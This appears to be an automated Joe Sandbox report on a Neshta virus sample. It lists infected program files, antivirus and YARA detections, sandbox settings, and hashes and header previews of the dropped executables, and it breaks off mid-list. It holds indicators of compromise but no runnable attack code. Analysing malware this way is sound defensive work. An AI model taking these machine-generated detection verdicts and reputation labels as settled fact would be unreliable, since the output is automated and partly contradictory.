                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%AviraW32/Neshta.A
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Neshta.A
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Uninstall.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%Joe Sandbox ML
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe97%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe91%MetadefenderBrowse
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe94%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe96%ReversingLabsWin32.Virus.Neshta
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe96%ReversingLabsWin32.Virus.Neshta

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.2.Z68mMCAxFZ.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File
                  0.0.Z68mMCAxFZ.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:490869
                  Start date:26.09.2021
                  Start time:16:52:32
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 20s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:Z68mMCAxFZ.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.spre.troj.evad.winEXE@5/111@0/0
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 49.6% (good quality ratio 47.9%)
                  • Quality average: 82.8%
                  • Quality standard deviation: 26.5%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 23.54.113.53, 204.79.197.222, 204.79.197.200, 13.107.21.200, 20.82.209.183, 23.0.174.200, 23.0.174.185, 20.50.102.62, 209.197.3.8, 23.10.249.26, 23.10.249.43, 20.54.110.249
                  • Excluded domains from analysis (whitelisted): fp.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, a-0019.standard.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe6LkjS4JhAl.exeGet hashmaliciousBrowse
                    09876523456789.exeGet hashmaliciousBrowse
                      Y4pMlX1fO2.exeGet hashmaliciousBrowse
                        B513104971C9E0C5B6721A523C9475701A67BB368A74F.exeGet hashmaliciousBrowse
                          1J5sT000kJ.exeGet hashmaliciousBrowse
                            ij99opH1kI.exeGet hashmaliciousBrowse
                              McAfeeStingerPortable.exeGet hashmaliciousBrowse
                                javaw.exeGet hashmaliciousBrowse
                                  javaw.exeGet hashmaliciousBrowse
                                    Lw6h2Z5Lg5.exeGet hashmaliciousBrowse
                                      Shipping documentsProforma invoice.exeGet hashmaliciousBrowse
                                        je60o4s3gS.exeGet hashmaliciousBrowse
                                          8doUcc9Dn2.exeGet hashmaliciousBrowse
                                            y9pE5n5u9D.exeGet hashmaliciousBrowse
                                              wVdurpHHFa.exeGet hashmaliciousBrowse
                                                smHWkWDwfX.exeGet hashmaliciousBrowse
                                                  dVUsIZmrvk.exeGet hashmaliciousBrowse
                                                    wIAWmUGebs.exeGet hashmaliciousBrowse
                                                      lAFVkA8CLk.dllGet hashmaliciousBrowse
                                                        PgIBHusOv7.exeGet hashmaliciousBrowse

                                                          Created / dropped Files

                                                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.278258254187173
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
                                                          MD5:E47F8A2ECDC2D4BFBBB6328B1391F1CC
                                                          SHA1:A633C3106A89C083014FC9F29D559B70E93D6D69
                                                          SHA-256:8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                                                          SHA-512:6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Joe Sandbox View:
                                                          • Filename: 6LkjS4JhAl.exe, Detection: malicious, Browse
                                                          • Filename: 09876523456789.exe, Detection: malicious, Browse
                                                          • Filename: Y4pMlX1fO2.exe, Detection: malicious, Browse
                                                          • Filename: B513104971C9E0C5B6721A523C9475701A67BB368A74F.exe, Detection: malicious, Browse
                                                          • Filename: 1J5sT000kJ.exe, Detection: malicious, Browse
                                                          • Filename: ij99opH1kI.exe, Detection: malicious, Browse
                                                          • Filename: McAfeeStingerPortable.exe, Detection: malicious, Browse
                                                          • Filename: javaw.exe, Detection: malicious, Browse
                                                          • Filename: javaw.exe, Detection: malicious, Browse
                                                          • Filename: Lw6h2Z5Lg5.exe, Detection: malicious, Browse
                                                          • Filename: Shipping documentsProforma invoice.exe, Detection: malicious, Browse
                                                          • Filename: je60o4s3gS.exe, Detection: malicious, Browse
                                                          • Filename: 8doUcc9Dn2.exe, Detection: malicious, Browse
                                                          • Filename: y9pE5n5u9D.exe, Detection: malicious, Browse
                                                          • Filename: wVdurpHHFa.exe, Detection: malicious, Browse
                                                          • Filename: smHWkWDwfX.exe, Detection: malicious, Browse
                                                          • Filename: dVUsIZmrvk.exe, Detection: malicious, Browse
                                                          • Filename: wIAWmUGebs.exe, Detection: malicious, Browse
                                                          • Filename: lAFVkA8CLk.dll, Detection: malicious, Browse
                                                          • Filename: PgIBHusOv7.exe, Detection: malicious, Browse
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.3372362912074625
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
                                                          MD5:10075707D5C79CDACFE09DEF9C6D4985
                                                          SHA1:7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
                                                          SHA-256:3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
                                                          SHA-512:C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.220006974675465
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
                                                          MD5:F447C4B446D5889225A9D9082145AD88
                                                          SHA1:A1A380F3D3402F243E1A213C39E969D2C24CA99E
                                                          SHA-256:C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
                                                          SHA-512:E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.356945716242827
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
                                                          MD5:DE64003856A8B74AEAF33E247AF9424B
                                                          SHA1:912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
                                                          SHA-256:A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
                                                          SHA-512:4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.486359083061706
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
                                                          MD5:D972E8BC4F221D69D9DF89999B74C311
                                                          SHA1:3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
                                                          SHA-256:8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
                                                          SHA-512:DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.5232250585402545
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
                                                          MD5:F648557D5287EC8C3677DC5B57E1C6AC
                                                          SHA1:B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
                                                          SHA-256:647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
                                                          SHA-512:033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.186107093668235
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                          MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                          SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                          SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                          SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.667436230875162
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                          MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                          SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                          SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                          SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.461209967778202
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                          MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
